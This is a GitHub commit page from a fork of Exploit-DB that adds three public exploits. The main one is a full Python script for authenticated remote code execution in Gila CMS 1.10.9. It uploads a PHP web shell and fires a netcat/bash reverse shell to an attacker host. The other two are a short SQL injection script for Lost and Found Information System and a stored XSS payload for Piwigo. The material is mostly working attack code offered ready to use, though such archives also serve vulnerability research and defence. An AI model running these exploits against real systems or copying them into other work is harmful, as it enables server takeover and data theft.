forked from offensive-security/exploitdb
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
4 changes to exploits/shellcodes/ghdb Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) Lost and Found Information System v1.0 - SQL Injection Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated)
- Loading branch information
Exploit-DB
committed
Jul 7, 2023
1 parent
9461677
commit e2ea5c0
Showing
4 changed files
with
142 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,100 @@ | ||
# Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated) | ||
# Date: 05-07-2023 | ||
# Exploit Author: Omer Shaik (unknown_exploit) | ||
# Vendor Homepage: https://gilacms.com/ | ||
# Software Link: https://github.com/GilaCMS/gila/ | ||
# Version: Gila 1.10.9 | ||
# Tested on: Linux | ||
|
||
import requests | ||
from termcolor import colored | ||
from urllib.parse import urlparse | ||
|
||
# Print ASCII art | ||
ascii_art = """ | ||
██████╗ ██╗██╗ █████╗ ██████╗███╗ ███╗███████╗ ██████╗ ██████╗███████╗ | ||
██╔════╝ ██║██║ ██╔══██╗ ██╔════╝████╗ ████║██╔════╝ ██╔══██╗██╔════╝██╔════╝ | ||
██║ ███╗██║██║ ███████║ ██║ ██╔████╔██║███████╗ ██████╔╝██║ █████╗ | ||
██║ ██║██║██║ ██╔══██║ ██║ ██║╚██╔╝██║╚════██║ ██╔══██╗██║ ██╔══╝ | ||
╚██████╔╝██║███████╗██║ ██║ ╚██████╗██║ ╚═╝ ██║███████║ ██║ ██║╚██████╗███████╗ | ||
╚═════╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═╝ ╚═════╝╚══════╝ | ||
by Unknown_Exploit | ||
""" | ||
|
||
print(colored(ascii_art, "green")) | ||
|
||
# Prompt user for target URL | ||
target_url = input("Enter the target login URL (e.g., http://example.com/admin/): ") | ||
|
||
# Extract domain from target URL | ||
parsed_url = urlparse(target_url) | ||
domain = parsed_url.netloc | ||
target_url_2 = f"http://{domain}/" | ||
|
||
# Prompt user for login credentials | ||
username = input("Enter the email: ") | ||
password = input("Enter the password: ") | ||
|
||
# Create a session and perform login | ||
session = requests.Session() | ||
login_payload = { | ||
'action': 'login', | ||
'username': username, | ||
'password': password | ||
} | ||
response = session.post(target_url, data=login_payload) | ||
cookie = response.cookies.get_dict() | ||
var1 = cookie['PHPSESSID'] | ||
var2 = cookie['GSESSIONID'] | ||
|
||
# Prompt user for local IP and port | ||
lhost = input("Enter the local IP (LHOST): ") | ||
lport = input("Enter the local port (LPORT): ") | ||
|
||
# Construct the payload | ||
payload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f" | ||
payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}" | ||
|
||
# Perform file upload using POST request | ||
upload_url = f"{target_url_2}fm/upload" | ||
upload_headers = { | ||
"Host": domain, | ||
"Content-Length": "424", | ||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", | ||
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2", | ||
"Accept": "*/*", | ||
"Origin": target_url_2, | ||
"Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess", | ||
"Accept-Encoding": "gzip, deflate", | ||
"Accept-Language": "en-US,en;q=0.9", | ||
"Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}", | ||
"Connection": "close" | ||
} | ||
upload_data = f''' | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2 | ||
Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7" | ||
Content-Type: application/x-php | ||
<?php system($_GET["cmd"]);?> | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2 | ||
Content-Disposition: form-data; name="path" | ||
tmp | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2 | ||
Content-Disposition: form-data; name="g_response" | ||
content | ||
------WebKitFormBoundarynKy5BIIJQcZC80i2-- | ||
''' | ||
|
||
upload_response = session.post(upload_url, headers=upload_headers, data=upload_data) | ||
|
||
if upload_response.status_code == 200: | ||
print("File uploaded successfully.") | ||
# Execute payload | ||
response = session.get(payload_url) | ||
print("Payload executed successfully.") | ||
else: | ||
print("Error uploading the file:", upload_response.text) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection | ||
# Date: 2023-06-30 | ||
# country: Iran | ||
# Exploit Author: Amirhossein Bahramizadeh | ||
# Category : webapps | ||
# Dork : /php-lfis/admin/?page=system_info/contact_information | ||
# Tested on: Windows/Linux | ||
# CVE : CVE-2023-33592 | ||
import requests | ||
|
||
# URL of the vulnerable component | ||
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information" | ||
|
||
# Injecting a SQL query to exploit the vulnerability | ||
payload = "' OR 1=1 -- " | ||
|
||
# Send the request with the injected payload | ||
response = requests.get(url + payload) | ||
|
||
# Check if the SQL injection was successful | ||
if "admin" in response.text: | ||
print("SQL injection successful!") | ||
else: | ||
print("SQL injection failed.") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,15 @@ | ||
#Exploit Title: Piwigo v13.7.0 - Stored Cross-Site Scripting (XSS) (Authenticated) | ||
#Date: 25 June 2023 | ||
#Exploit Author: Okan Kurtulus | ||
#Vendor Homepage: https://piwigo.org | ||
#Version: 13.7.0 | ||
#Tested on: Ubuntu 22.04 | ||
#CVE : N/A | ||
|
||
# Proof of Concept: | ||
1– Install the system through the website and log in with any user authorized to upload photos. | ||
2– Click "Add" under "Photos" from the left menu. The photo you want to upload is selected and uploaded. | ||
3– Click on the uploaded photo and the photo editing screen opens. XSS payload is entered in the "Description" section on this screen. After saving the file, go to the homepage and open the page with the photo. The XSS payload appears to be triggered. | ||
|
||
#Payload | ||
<sCriPt>alert(1);</sCriPt> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters